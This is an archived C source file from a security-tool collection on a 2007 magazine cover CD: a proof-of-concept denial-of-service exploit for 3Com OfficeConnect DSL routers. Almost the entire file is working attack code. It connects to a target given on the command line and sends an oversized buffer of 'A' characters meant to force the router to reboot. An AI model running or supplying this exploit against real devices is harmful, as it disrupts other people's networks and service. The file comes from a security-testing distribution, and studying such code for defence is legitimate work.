Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / 3com / 3com-DoS.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 74 lines

/* 3com-DoS.c * * PoC DoS exploit for 3Com OfficeConnect DSL Routers. This PoC exploit the * vulnerability documented at: <http://www.securityfocus.com/bid/8248>, * discovered by David F. Madrid. * * Successful exploitation of the vulnerability should cause the router to * reboot. It is not believed that arbitrary code execution is possible - * check advisory for more information. * * -shaun2k2 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> int main(int argc, char *argv[]) { if(argc < 3) { printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n"); printf("Usage: 3comDoS <3com_router> <port>\n"); exit(-1); } int sock; char explbuf[521]; struct sockaddr_in dest; struct hostent *he; if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve %s!\n", argv[1]); exit(-1); } if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(-1); } printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n"); dest.sin_addr = *((struct in_addr *)he->h_addr); dest.sin_port = htons(atoi(argv[2])); dest.sin_family = AF_INET; printf("[+] Crafting exploit buffer.\n"); memset(explbuf, 'A', 512); memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) { perror("connect()"); exit(-1); } printf("[+] Connected...Sending exploit buffer!\n"); send(sock, explbuf, strlen(explbuf), 0); sleep(2); close(sock); printf("\n[+] Exploit buffer sent!\n"); return(0); }